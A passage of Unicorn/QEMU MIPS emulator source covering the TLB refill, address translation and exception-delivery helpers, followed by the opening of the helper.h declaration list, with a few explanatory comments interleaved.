case 2: m = (1 << pf_udw) - 1; if (pf_udw & 1) { m >>= 1; } break; case 1: m = (1 << pf_mdw) - 1; if (pf_mdw & 1) { m >>= 1; } break; } } pw_pagemask = m >> 12; update_pagemask(env, pw_pagemask << 13, &pw_pagemask); pw_entryhi = (address & ~0x1fff) | (env->CP0_EntryHi & 0xFF); { target_ulong tmp_entryhi = env->CP0_EntryHi; int32_t tmp_pagemask = env->CP0_PageMask; uint64_t tmp_entrylo0 = env->CP0_EntryLo0; uint64_t tmp_entrylo1 = env->CP0_EntryLo1; env->CP0_EntryHi = pw_entryhi; env->CP0_PageMask = pw_pagemask; env->CP0_EntryLo0 = pw_entrylo0; env->CP0_EntryLo1 = pw_entrylo1; /* * The hardware page walker inserts a page into the TLB in a manner * identical to a TLBWR instruction as executed by the software refill * handler. 
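*/

/*
 * Editor's note: the block above stages the walker's results in the real
 * CP0 refill registers, lets the normal TLBWR path install the entry,
 * then puts the guest's values back -- a save/override/restore idiom.
 * In miniature (sketch only; GCC-style typeof, which QEMU itself relies
 * on, and a hypothetical macro name):
 */
#define WITH_CP0_OVERRIDE(reg, tmpval, stmt) do { \
        typeof(reg) saved_ = (reg);               \
        (reg) = (tmpval);    /* expose staged value */   \
        stmt;                /* e.g. the TLBWR helper */ \
        (reg) = saved_;      /* restore guest state */   \
    } while (0)

/* (TLB insertion via the standard TLBWR path: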
*/ r4k_helper_tlbwr(env); env->CP0_EntryHi = tmp_entryhi; env->CP0_PageMask = tmp_pagemask; env->CP0_EntryLo0 = tmp_entrylo0; env->CP0_EntryLo1 = tmp_entrylo1; } return true; } #endif bool mips_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; hwaddr physical; int prot; int mips_access_type; int ret = TLBRET_BADADDR; /* data access */ /* XXX: put correct access by using cpu_restore_state() correctly */ mips_access_type = ACCESS_INT; ret = get_physical_address(env, &physical, &prot, address, access_type, mips_access_type, mmu_idx); switch (ret) { case TLBRET_MATCH: qemu_log_mask(CPU_LOG_MMU, "%s address=%" VADDR_PRIx " physical " TARGET_FMT_plx " prot %d\n", __func__, address, physical, prot); break; default: qemu_log_mask(CPU_LOG_MMU, "%s address=%" VADDR_PRIx " ret %d\n", __func__, address, ret); break; } if (ret == TLBRET_MATCH) { tlb_set_page(cs, address & TARGET_PAGE_MASK, physical & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } #if !defined(TARGET_MIPS64) if ((ret == TLBRET_NOMATCH) && (env->tlb->nb_tlb > 1)) { /* * Memory reads during hardware page table walking are performed * as if they were kernel-mode load instructions. */ int mode = (env->hflags & MIPS_HFLAG_KSU); bool ret_walker; env->hflags &= ~MIPS_HFLAG_KSU; ret_walker = page_table_walk_refill(env, address, access_type, mmu_idx); env->hflags |= mode; if (ret_walker) { ret = get_physical_address(env, &physical, &prot, address, access_type, mips_access_type, mmu_idx); if (ret == TLBRET_MATCH) { tlb_set_page(cs, address & TARGET_PAGE_MASK, physical & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } } } #endif if (probe) { return false; } raise_mmu_exception(env, address, access_type, ret); do_raise_exception_err(env, cs->exception_index, env->error_code, retaddr); } hwaddr cpu_mips_translate_address(CPUMIPSState *env, target_ulong address, int rw) { hwaddr physical; int prot; int access_type; int ret = 0; /* data access */ access_type = ACCESS_INT; ret = get_physical_address(env, &physical, &prot, address, rw, access_type, cpu_mmu_index(env, false)); if (ret != TLBRET_MATCH) { raise_mmu_exception(env, address, rw, ret); return -1LL; } else { return physical; } } #if 0 static const char * const excp_names[EXCP_LAST + 1] = { [EXCP_RESET] = "reset", [EXCP_SRESET] = "soft reset", [EXCP_DSS] = "debug single step", [EXCP_DINT] = "debug interrupt", [EXCP_NMI] = "non-maskable interrupt", [EXCP_MCHECK] = "machine check", [EXCP_EXT_INTERRUPT] = "interrupt", [EXCP_DFWATCH] = "deferred watchpoint", [EXCP_DIB] = "debug instruction breakpoint", [EXCP_IWATCH] = "instruction fetch watchpoint", [EXCP_AdEL] = "address error load", [EXCP_AdES] = "address error store", [EXCP_TLBF] = "TLB refill", [EXCP_IBE] = "instruction bus error", [EXCP_DBp] = "debug breakpoint", [EXCP_SYSCALL] = "syscall", [EXCP_BREAK] = "break", [EXCP_CpU] = "coprocessor unusable", [EXCP_RI] = "reserved instruction", [EXCP_OVERFLOW] = "arithmetic overflow", [EXCP_TRAP] = "trap", [EXCP_FPE] = "floating point", [EXCP_DDBS] = "debug data break store", [EXCP_DWATCH] = "data watchpoint", [EXCP_LTLBL] = "TLB modify", [EXCP_TLBL] = "TLB load", [EXCP_TLBS] = "TLB store", [EXCP_DBE] = "data bus error", [EXCP_DDBL] = "debug data break load", [EXCP_THREAD] = "thread", [EXCP_MDMX] = "MDMX", [EXCP_C2E] = "precise coprocessor 2", [EXCP_CACHE] = "cache error", [EXCP_TLBXI] = "TLB execute-inhibit", [EXCP_TLBRI] = "TLB 
read-inhibit", [EXCP_MSADIS] = "MSA disabled", [EXCP_MSAFPE] = "MSA floating point", }; #endif target_ulong exception_resume_pc(CPUMIPSState *env) { target_ulong bad_pc; target_ulong isa_mode; isa_mode = !!(env->hflags & MIPS_HFLAG_M16); bad_pc = env->active_tc.PC | isa_mode; if (env->hflags & MIPS_HFLAG_BMASK) { /* * If the exception was raised from a delay slot, come back to * the jump. */ bad_pc -= (env->hflags & MIPS_HFLAG_B16 ? 2 : 4); } return bad_pc; } static void set_hflags_for_handler(CPUMIPSState *env) { /* Exception handlers are entered in 32-bit mode. */ env->hflags &= ~(MIPS_HFLAG_M16); /* ...except that microMIPS lets you choose. */ if (env->insn_flags & ASE_MICROMIPS) { env->hflags |= (!!(env->CP0_Config3 & (1 << CP0C3_ISA_ON_EXC)) << MIPS_HFLAG_M16_SHIFT); } } static inline void set_badinstr_registers(CPUMIPSState *env) { if (env->insn_flags & ISA_NANOMIPS32) { if (env->CP0_Config3 & (1 << CP0C3_BI)) { uint32_t instr = (cpu_lduw_code(env, env->active_tc.PC)) << 16; if ((instr & 0x10000000) == 0) { instr |= cpu_lduw_code(env, env->active_tc.PC + 2); } env->CP0_BadInstr = instr; if ((instr & 0xFC000000) == 0x60000000) { instr = cpu_lduw_code(env, env->active_tc.PC + 4) << 16; env->CP0_BadInstrX = instr; } } return; } if (env->hflags & MIPS_HFLAG_M16) { /* TODO: add BadInstr support for microMIPS */ return; } if (env->CP0_Config3 & (1 << CP0C3_BI)) { env->CP0_BadInstr = cpu_ldl_code(env, env->active_tc.PC); } if ((env->CP0_Config3 & (1 << CP0C3_BP)) && (env->hflags & MIPS_HFLAG_BMASK)) { env->CP0_BadInstrP = cpu_ldl_code(env, env->active_tc.PC - 4); } } void mips_cpu_do_interrupt(CPUState *cs) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; bool update_badinstr = 0; target_ulong offset; int cause = -1; #if 0 const char *name; if (qemu_loglevel_mask(CPU_LOG_INT) && cs->exception_index != EXCP_EXT_INTERRUPT) { if (cs->exception_index < 0 || cs->exception_index > EXCP_LAST) { name = "unknown"; } else { name = excp_names[cs->exception_index]; } qemu_log("%s enter: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " %s exception\n", __func__, env->active_tc.PC, env->CP0_EPC, name); } #endif if (cs->exception_index == EXCP_EXT_INTERRUPT && (env->hflags & MIPS_HFLAG_DM)) { cs->exception_index = EXCP_DINT; } offset = 0x180; switch (cs->exception_index) { case EXCP_DSS: env->CP0_Debug |= 1 << CP0DB_DSS; /* * Debug single step cannot be raised inside a delay slot and * resume will always occur on the next instruction * (but we assume the pc has always been updated during * code translation). */ env->CP0_DEPC = env->active_tc.PC | !!(env->hflags & MIPS_HFLAG_M16); goto enter_debug_mode; case EXCP_DINT: env->CP0_Debug |= 1 << CP0DB_DINT; goto set_DEPC; case EXCP_DIB: env->CP0_Debug |= 1 << CP0DB_DIB; goto set_DEPC; case EXCP_DBp: env->CP0_Debug |= 1 << CP0DB_DBp; /* Setup DExcCode - SDBBP instruction */ env->CP0_Debug = (env->CP0_Debug & ~(0x1fULL << CP0DB_DEC)) | (9 << CP0DB_DEC); goto set_DEPC; case EXCP_DDBS: env->CP0_Debug |= 1 << CP0DB_DDBS; goto set_DEPC; case EXCP_DDBL: env->CP0_Debug |= 1 << CP0DB_DDBL; set_DEPC: env->CP0_DEPC = exception_resume_pc(env); env->hflags &= ~MIPS_HFLAG_BMASK; enter_debug_mode: if (env->insn_flags & ISA_MIPS3) { env->hflags |= MIPS_HFLAG_64; if (!(env->insn_flags & ISA_MIPS64R6) || env->CP0_Status & (1 << CP0St_KX)) { env->hflags &= ~MIPS_HFLAG_AWRAP; } } env->hflags |= MIPS_HFLAG_DM | MIPS_HFLAG_CP0; env->hflags &= ~(MIPS_HFLAG_KSU); /* EJTAG probe trap enable is not implemented... 
*/ if (!(env->CP0_Status & (1 << CP0St_EXL))) { env->CP0_Cause &= ~(1U << CP0Ca_BD); } env->active_tc.PC = env->exception_base + 0x480; set_hflags_for_handler(env); break; case EXCP_RESET: cpu_reset(CPU(cpu)); break; case EXCP_SRESET: env->CP0_Status |= (1 << CP0St_SR); memset(env->CP0_WatchLo, 0, sizeof(env->CP0_WatchLo)); goto set_error_EPC; case EXCP_NMI: env->CP0_Status |= (1 << CP0St_NMI); set_error_EPC: env->CP0_ErrorEPC = exception_resume_pc(env); env->hflags &= ~MIPS_HFLAG_BMASK; env->CP0_Status |= (1 << CP0St_ERL) | (1 << CP0St_BEV); if (env->insn_flags & ISA_MIPS3) { env->hflags |= MIPS_HFLAG_64; if (!(env->insn_flags & ISA_MIPS64R6) || env->CP0_Status & (1 << CP0St_KX)) { env->hflags &= ~MIPS_HFLAG_AWRAP; } } env->hflags |= MIPS_HFLAG_CP0; env->hflags &= ~(MIPS_HFLAG_KSU); if (!(env->CP0_Status & (1 << CP0St_EXL))) { env->CP0_Cause &= ~(1U << CP0Ca_BD); } env->active_tc.PC = env->exception_base; set_hflags_for_handler(env); break; case EXCP_EXT_INTERRUPT: cause = 0; if (env->CP0_Cause & (1 << CP0Ca_IV)) { uint32_t spacing = (env->CP0_IntCtl >> CP0IntCtl_VS) & 0x1f; if ((env->CP0_Status & (1 << CP0St_BEV)) || spacing == 0) { offset = 0x200; } else { uint32_t vector = 0; uint32_t pending = (env->CP0_Cause & CP0Ca_IP_mask) >> CP0Ca_IP; if (env->CP0_Config3 & (1 << CP0C3_VEIC)) { /* * For VEIC mode, the external interrupt controller feeds * the vector through the CP0Cause IP lines. */ vector = pending; } else { /* * Vectored Interrupts * Mask with Status.IM7-IM0 to get enabled interrupts. */ pending &= (env->CP0_Status >> CP0St_IM) & 0xff; /* Find the highest-priority interrupt. */ while (pending >>= 1) { vector++; } } offset = 0x200 + (vector * (spacing << 5)); } } goto set_EPC; case EXCP_LTLBL: cause = 1; update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); goto set_EPC; case EXCP_TLBL: cause = 2; update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); if ((env->error_code & EXCP_TLB_NOMATCH) && !(env->CP0_Status & (1 << CP0St_EXL))) { #if defined(TARGET_MIPS64) int R = env->CP0_BadVAddr >> 62; int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; if ((R != 0 || UX) && (R != 3 || KX) && (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) { offset = 0x080; } else { #endif offset = 0x000; #if defined(TARGET_MIPS64) } #endif } goto set_EPC; case EXCP_TLBS: cause = 3; update_badinstr = 1; if ((env->error_code & EXCP_TLB_NOMATCH) && !(env->CP0_Status & (1 << CP0St_EXL))) { #if defined(TARGET_MIPS64) int R = env->CP0_BadVAddr >> 62; int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; if ((R != 0 || UX) && (R != 3 || KX) && (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) { offset = 0x080; } else { #endif offset = 0x000; #if defined(TARGET_MIPS64) } #endif } goto set_EPC; case EXCP_AdEL: cause = 4; update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); goto set_EPC; case EXCP_AdES: cause = 5; update_badinstr = 1; goto set_EPC; case EXCP_IBE: cause = 6; goto set_EPC; case EXCP_DBE: cause = 7; goto set_EPC; case EXCP_SYSCALL: cause = 8; update_badinstr = 1; goto set_EPC; case EXCP_BREAK: cause = 9; update_badinstr = 1; goto set_EPC; case EXCP_RI: cause = 10; update_badinstr = 1; goto set_EPC; case EXCP_CpU: cause = 11; update_badinstr = 1; env->CP0_Cause = (env->CP0_Cause & ~(0x3 << CP0Ca_CE)) | (env->error_code << CP0Ca_CE); goto set_EPC; case EXCP_OVERFLOW: cause = 12; update_badinstr = 1; goto set_EPC; case EXCP_TRAP: cause = 13; update_badinstr = 1; goto 
set_EPC; case EXCP_MSAFPE: cause = 14; update_badinstr = 1; goto set_EPC; case EXCP_FPE: cause = 15; update_badinstr = 1; goto set_EPC; case EXCP_C2E: cause = 18; goto set_EPC; case EXCP_TLBRI: cause = 19; update_badinstr = 1; goto set_EPC; case EXCP_TLBXI: cause = 20; goto set_EPC; case EXCP_MSADIS: cause = 21; update_badinstr = 1; goto set_EPC; case EXCP_MDMX: cause = 22; goto set_EPC; case EXCP_DWATCH: cause = 23; /* XXX: TODO: manage deferred watch exceptions */ goto set_EPC; case EXCP_MCHECK: cause = 24; goto set_EPC; case EXCP_THREAD: cause = 25; goto set_EPC; case EXCP_DSPDIS: cause = 26; goto set_EPC; case EXCP_CACHE: cause = 30; offset = 0x100; set_EPC: if (!(env->CP0_Status & (1 << CP0St_EXL))) { env->CP0_EPC = exception_resume_pc(env); if (update_badinstr) { set_badinstr_registers(env); } if (env->hflags & MIPS_HFLAG_BMASK) { env->CP0_Cause |= (1U << CP0Ca_BD); } else { env->CP0_Cause &= ~(1U << CP0Ca_BD); } env->CP0_Status |= (1 << CP0St_EXL); if (env->insn_flags & ISA_MIPS3) { env->hflags |= MIPS_HFLAG_64; if (!(env->insn_flags & ISA_MIPS64R6) || env->CP0_Status & (1 << CP0St_KX)) { env->hflags &= ~MIPS_HFLAG_AWRAP; } } env->hflags |= MIPS_HFLAG_CP0; env->hflags &= ~(MIPS_HFLAG_KSU); } env->hflags &= ~MIPS_HFLAG_BMASK; if (env->CP0_Status & (1 << CP0St_BEV)) { env->active_tc.PC = env->exception_base + 0x200; } else if (cause == 30 && !(env->CP0_Config3 & (1 << CP0C3_SC) && env->CP0_Config5 & (1 << CP0C5_CV))) { /* Force KSeg1 for cache errors */ env->active_tc.PC = KSEG1_BASE | (env->CP0_EBase & 0x1FFFF000); } else { env->active_tc.PC = env->CP0_EBase & ~0xfff; } env->active_tc.PC += offset; set_hflags_for_handler(env); env->CP0_Cause = (env->CP0_Cause & ~(0x1f << CP0Ca_EC)) | (cause << CP0Ca_EC); break; default: abort(); } #if 0 if (qemu_loglevel_mask(CPU_LOG_INT) && cs->exception_index != EXCP_EXT_INTERRUPT) { qemu_log("%s: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " cause %d\n" " S %08x C %08x A " TARGET_FMT_lx " D " TARGET_FMT_lx "\n", __func__, env->active_tc.PC, env->CP0_EPC, cause, env->CP0_Status, env->CP0_Cause, env->CP0_BadVAddr, env->CP0_DEPC); } #endif cs->exception_index = EXCP_NONE; } bool mips_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; if (cpu_mips_hw_interrupts_enabled(env) && cpu_mips_hw_interrupts_pending(env)) { /* Raise it */ cs->exception_index = EXCP_EXT_INTERRUPT; env->error_code = 0; mips_cpu_do_interrupt(cs); return true; } } return false; } void r4k_invalidate_tlb(CPUMIPSState *env, int idx, int use_extra) { CPUState *cs = env_cpu(env); r4k_tlb_t *tlb; target_ulong addr; target_ulong end; uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint32_t tlb_mmid; target_ulong mask; MMID = mi ? MMID : (uint32_t) ASID; tlb = &env->tlb->mmu.r4k.tlb[idx]; /* * The qemu TLB is flushed when the ASID/MMID changes, so no need to * flush these entries again. */ tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; if (tlb->G == 0 && tlb_mmid != MMID) { return; } if (use_extra && env->tlb->tlb_in_use < MIPS_TLB_MAX) { /* * For tlbwr, we can shadow the discarded entry into * a new (fake) TLB entry, as long as the guest can not * tell that it's there. */ env->tlb->mmu.r4k.tlb[env->tlb->tlb_in_use] = *tlb; env->tlb->tlb_in_use++; return; } /* 1k pages are not supported. 
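*/

/*
 * Editor's note: the invalidation below walks every host page the entry
 * spans: mask widens TARGET_PAGE_MASK by the entry's PageMask, the even
 * page covers [VPN, VPN | mask>>1] and the odd page the next half. The
 * size arithmetic in isolation (sketch assuming 4 KiB base pages):
 */
#include <stdint.h>

/* number of 4 KiB pages covered by one side of a MIPS TLB pair */
static unsigned pages_per_side(uint32_t pagemask)
{
    uint32_t mask = pagemask | 0x1FFF;   /* 4 KiB pair -> 13 low bits set */
    return ((mask >> 1) + 1) / 4096;     /* e.g. 16 KiB PageMask -> 4 pages */
}

/* as noted above, 1k pages are not supported; the flush walks each side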
*/ mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); if (tlb->V0) { addr = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { addr |= 0x3FFFFF0000000000ULL; } #endif end = addr | (mask >> 1); while (addr < end) { tlb_flush_page(cs, addr); addr += TARGET_PAGE_SIZE; } } if (tlb->V1) { addr = (tlb->VPN & ~mask) | ((mask >> 1) + 1); #if defined(TARGET_MIPS64) if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { addr |= 0x3FFFFF0000000000ULL; } #endif end = addr | mask; while (addr - 1 < end) { tlb_flush_page(cs, addr); addr += TARGET_PAGE_SIZE; } } } void QEMU_NORETURN do_raise_exception_err(CPUMIPSState *env, uint32_t exception, int error_code, uintptr_t pc) { CPUState *cs = env_cpu(env); #if 0 qemu_log_mask(CPU_LOG_INT, "%s: %d %d\n", __func__, exception, error_code); #endif cs->exception_index = exception; env->error_code = error_code; // Unicorn: Imported from https://github.com/unicorn-engine/unicorn/pull/1098 if (exception == 0x11) { env->uc->next_pc = env->active_tc.PC + 4; } cpu_loop_exit_restore(cs, pc); } unicorn-2.1.1/qemu/target/mips/helper.h000066400000000000000000000135635146752410670020056 0ustar00rootroot00000000000000DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_3(raise_exception_err, noreturn, env, i32, int) DEF_HELPER_2(raise_exception, noreturn, env, i32) DEF_HELPER_1(raise_exception_debug, noreturn, env) // DEF_HELPER_1(do_semihosting, void, env) #ifdef TARGET_MIPS64 DEF_HELPER_4(sdl, void, env, tl, tl, int) DEF_HELPER_4(sdr, void, env, tl, tl, int) #endif DEF_HELPER_4(swl, void, env, tl, tl, int) DEF_HELPER_4(swr, void, env, tl, tl, int) DEF_HELPER_3(ll, tl, env, tl, int) #ifdef TARGET_MIPS64 DEF_HELPER_3(lld, tl, env, tl, int) #endif DEF_HELPER_3(muls, tl, env, tl, tl) DEF_HELPER_3(mulsu, tl, env, tl, tl) DEF_HELPER_3(macc, tl, env, tl, tl) DEF_HELPER_3(maccu, tl, env, tl, tl) DEF_HELPER_3(msac, tl, env, tl, tl) DEF_HELPER_3(msacu, tl, env, tl, tl) DEF_HELPER_3(mulhi, tl, env, tl, tl) DEF_HELPER_3(mulhiu, tl, env, tl, tl) DEF_HELPER_3(mulshi, tl, env, tl, tl) DEF_HELPER_3(mulshiu, tl, env, tl, tl) DEF_HELPER_3(macchi, tl, env, tl, tl) DEF_HELPER_3(macchiu, tl, env, tl, tl) DEF_HELPER_3(msachi, tl, env, tl, tl) DEF_HELPER_3(msachiu, tl, env, tl, tl) DEF_HELPER_FLAGS_1(bitswap, TCG_CALL_NO_RWG_SE, tl, tl) #ifdef TARGET_MIPS64 DEF_HELPER_FLAGS_1(dbitswap, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_4(rotx, TCG_CALL_NO_RWG_SE, tl, tl, i32, i32, i32) /* CP0 helpers */ DEF_HELPER_1(mfc0_mvpcontrol, tl, env) DEF_HELPER_1(mfc0_mvpconf0, tl, env) DEF_HELPER_1(mfc0_mvpconf1, tl, env) DEF_HELPER_1(mftc0_vpecontrol, tl, env) DEF_HELPER_1(mftc0_vpeconf0, tl, env) DEF_HELPER_1(mfc0_random, tl, env) DEF_HELPER_1(mfc0_tcstatus, tl, env) DEF_HELPER_1(mftc0_tcstatus, tl, env) DEF_HELPER_1(mfc0_tcbind, tl, env) DEF_HELPER_1(mftc0_tcbind, tl, env) DEF_HELPER_1(mfc0_tcrestart, tl, env) DEF_HELPER_1(mftc0_tcrestart, tl, env) DEF_HELPER_1(mfc0_tchalt, tl, env)
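/*
 * Reading aid, not part of the original declarations: helper.h is an
 * "x-macro" header that QEMU includes several times with different
 * definitions of DEF_HELPER_N() to generate function prototypes, TCG
 * call descriptors, and so on.  The first macro argument is the helper
 * name, the second the return type, and the remaining N the argument
 * types; "tl" stands for target_ulong and "env" for the CPU state
 * pointer.  Expanded by exec/helper-proto.h, an entry such as
 * DEF_HELPER_3(ll, tl, env, tl, int) becomes, roughly:
 *
 *     target_ulong helper_ll(CPUMIPSState *env, target_ulong, int);
 */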
DEF_HELPER_1(mftc0_tchalt, tl, env) DEF_HELPER_1(mfc0_tccontext, tl, env) DEF_HELPER_1(mftc0_tccontext, tl, env) DEF_HELPER_1(mfc0_tcschedule, tl, env) DEF_HELPER_1(mftc0_tcschedule, tl, env) DEF_HELPER_1(mfc0_tcschefback, tl, env) DEF_HELPER_1(mftc0_tcschefback, tl, env) DEF_HELPER_1(mfc0_count, tl, env) DEF_HELPER_1(mfc0_saar, tl, env) DEF_HELPER_1(mfhc0_saar, tl, env) DEF_HELPER_1(mftc0_entryhi, tl, env) DEF_HELPER_1(mftc0_status, tl, env) DEF_HELPER_1(mftc0_cause, tl, env) DEF_HELPER_1(mftc0_epc, tl, env) DEF_HELPER_1(mftc0_ebase, tl, env) DEF_HELPER_2(mftc0_configx, tl, env, tl) DEF_HELPER_1(mfc0_lladdr, tl, env) DEF_HELPER_1(mfc0_maar, tl, env) DEF_HELPER_1(mfhc0_maar, tl, env) DEF_HELPER_2(mfc0_watchlo, tl, env, i32) DEF_HELPER_2(mfc0_watchhi, tl, env, i32) DEF_HELPER_2(mfhc0_watchhi, tl, env, i32) DEF_HELPER_1(mfc0_debug, tl, env) DEF_HELPER_1(mftc0_debug, tl, env) #ifdef TARGET_MIPS64 DEF_HELPER_1(dmfc0_tcrestart, tl, env) DEF_HELPER_1(dmfc0_tchalt, tl, env) DEF_HELPER_1(dmfc0_tccontext, tl, env) DEF_HELPER_1(dmfc0_tcschedule, tl, env) DEF_HELPER_1(dmfc0_tcschefback, tl, env) DEF_HELPER_1(dmfc0_lladdr, tl, env) DEF_HELPER_1(dmfc0_maar, tl, env) DEF_HELPER_2(dmfc0_watchlo, tl, env, i32) DEF_HELPER_2(dmfc0_watchhi, tl, env, i32) DEF_HELPER_1(dmfc0_saar, tl, env) #endif /* TARGET_MIPS64 */ DEF_HELPER_2(mtc0_index, void, env, tl) DEF_HELPER_2(mtc0_mvpcontrol, void, env, tl) DEF_HELPER_2(mtc0_vpecontrol, void, env, tl) DEF_HELPER_2(mttc0_vpecontrol, void, env, tl) DEF_HELPER_2(mtc0_vpeconf0, void, env, tl) DEF_HELPER_2(mttc0_vpeconf0, void, env, tl) DEF_HELPER_2(mtc0_vpeconf1, void, env, tl) DEF_HELPER_2(mtc0_yqmask, void, env, tl) DEF_HELPER_2(mtc0_vpeopt, void, env, tl) DEF_HELPER_2(mtc0_entrylo0, void, env, tl) DEF_HELPER_2(mtc0_tcstatus, void, env, tl) DEF_HELPER_2(mttc0_tcstatus, void, env, tl) DEF_HELPER_2(mtc0_tcbind, void, env, tl) DEF_HELPER_2(mttc0_tcbind, void, env, tl) DEF_HELPER_2(mtc0_tcrestart, void, env, tl) DEF_HELPER_2(mttc0_tcrestart, void, env, tl) DEF_HELPER_2(mtc0_tchalt, void, env, tl) DEF_HELPER_2(mttc0_tchalt, void, env, tl) DEF_HELPER_2(mtc0_tccontext, void, env, tl) DEF_HELPER_2(mttc0_tccontext, void, env, tl) DEF_HELPER_2(mtc0_tcschedule, void, env, tl) DEF_HELPER_2(mttc0_tcschedule, void, env, tl) DEF_HELPER_2(mtc0_tcschefback, void, env, tl) DEF_HELPER_2(mttc0_tcschefback, void, env, tl) DEF_HELPER_2(mtc0_entrylo1, void, env, tl) DEF_HELPER_2(mtc0_context, void, env, tl) DEF_HELPER_2(mtc0_memorymapid, void, env, tl) DEF_HELPER_2(mtc0_pagemask, void, env, tl) DEF_HELPER_2(mtc0_pagegrain, void, env, tl) DEF_HELPER_2(mtc0_segctl0, void, env, tl) DEF_HELPER_2(mtc0_segctl1, void, env, tl) DEF_HELPER_2(mtc0_segctl2, void, env, tl) DEF_HELPER_2(mtc0_pwfield, void, env, tl) DEF_HELPER_2(mtc0_pwsize, void, env, tl) DEF_HELPER_2(mtc0_wired, void, env, tl) DEF_HELPER_2(mtc0_srsconf0, void, env, tl) DEF_HELPER_2(mtc0_srsconf1, void, env, tl) DEF_HELPER_2(mtc0_srsconf2, void, env, tl) DEF_HELPER_2(mtc0_srsconf3, void, env, tl) DEF_HELPER_2(mtc0_srsconf4, void, env, tl) DEF_HELPER_2(mtc0_hwrena, void, env, tl) DEF_HELPER_2(mtc0_pwctl, void, env, tl) DEF_HELPER_2(mtc0_count, void, env, tl) DEF_HELPER_2(mtc0_saari, void, env, tl) DEF_HELPER_2(mtc0_saar, void, env, tl) DEF_HELPER_2(mthc0_saar, void, env, tl) DEF_HELPER_2(mtc0_entryhi, void, env, tl) DEF_HELPER_2(mttc0_entryhi, void, env, tl) DEF_HELPER_2(mtc0_compare, void, env, tl) DEF_HELPER_2(mtc0_status, void, env, tl) DEF_HELPER_2(mttc0_status, void, env, tl) DEF_HELPER_2(mtc0_intctl, void, env, tl) 
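/*
 * Naming note for the CP0 accessors above and below: "mfc0"/"mtc0" are
 * move-from/move-to coprocessor 0, "dmfc0"/"dmtc0" the 64-bit doubleword
 * forms, "mfhc0"/"mthc0" touch the high half of extended-width CP0
 * registers, and "mftc0"/"mttc0" are the MT-ASE cross-thread forms that
 * operate on the thread context selected via VPEControl.TargTC.
 */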
DEF_HELPER_2(mtc0_srsctl, void, env, tl) DEF_HELPER_2(mtc0_cause, void, env, tl) DEF_HELPER_2(mttc0_cause, void, env, tl) DEF_HELPER_2(mtc0_ebase, void, env, tl) DEF_HELPER_2(mttc0_ebase, void, env, tl) DEF_HELPER_2(mtc0_config0, void, env, tl) DEF_HELPER_2(mtc0_config2, void, env, tl) DEF_HELPER_2(mtc0_config3, void, env, tl) DEF_HELPER_2(mtc0_config4, void, env, tl) DEF_HELPER_2(mtc0_config5, void, env, tl) DEF_HELPER_2(mtc0_lladdr, void, env, tl) DEF_HELPER_2(mtc0_maar, void, env, tl) DEF_HELPER_2(mthc0_maar, void, env, tl) DEF_HELPER_2(mtc0_maari, void, env, tl) DEF_HELPER_3(mtc0_watchlo, void, env, tl, i32) DEF_HELPER_3(mtc0_watchhi, void, env, tl, i32) DEF_HELPER_3(mthc0_watchhi, void, env, tl, i32) DEF_HELPER_2(mtc0_xcontext, void, env, tl) DEF_HELPER_2(mtc0_framemask, void, env, tl) DEF_HELPER_2(mtc0_debug, void, env, tl) DEF_HELPER_2(mttc0_debug, void, env, tl) DEF_HELPER_2(mtc0_performance0, void, env, tl) DEF_HELPER_2(mtc0_errctl, void, env, tl) DEF_HELPER_2(mtc0_taglo, void, env, tl) DEF_HELPER_2(mtc0_datalo, void, env, tl) DEF_HELPER_2(mtc0_taghi, void, env, tl) DEF_HELPER_2(mtc0_datahi, void, env, tl) #if defined(TARGET_MIPS64) DEF_HELPER_2(dmtc0_entrylo0, void, env, i64) DEF_HELPER_2(dmtc0_entrylo1, void, env, i64) #endif /* MIPS MT functions */ DEF_HELPER_2(mftgpr, tl, env, i32) DEF_HELPER_2(mftlo, tl, env, i32) DEF_HELPER_2(mfthi, tl, env, i32) DEF_HELPER_2(mftacx, tl, env, i32) DEF_HELPER_1(mftdsp, tl, env) DEF_HELPER_3(mttgpr, void, env, tl, i32) DEF_HELPER_3(mttlo, void, env, tl, i32) DEF_HELPER_3(mtthi, void, env, tl, i32) DEF_HELPER_3(mttacx, void, env, tl, i32) DEF_HELPER_2(mttdsp, void, env, tl) DEF_HELPER_0(dmt, tl) DEF_HELPER_0(emt, tl) DEF_HELPER_1(dvpe, tl, env) DEF_HELPER_1(evpe, tl, env) /* R6 Multi-threading */ DEF_HELPER_1(dvp, tl, env) DEF_HELPER_1(evp, tl, env) /* microMIPS functions */ DEF_HELPER_4(lwm, void, env, tl, tl, i32) DEF_HELPER_4(swm, void, env, tl, tl, i32) #ifdef TARGET_MIPS64 DEF_HELPER_4(ldm, void, env, tl, tl, i32) DEF_HELPER_4(sdm, void, env, tl, 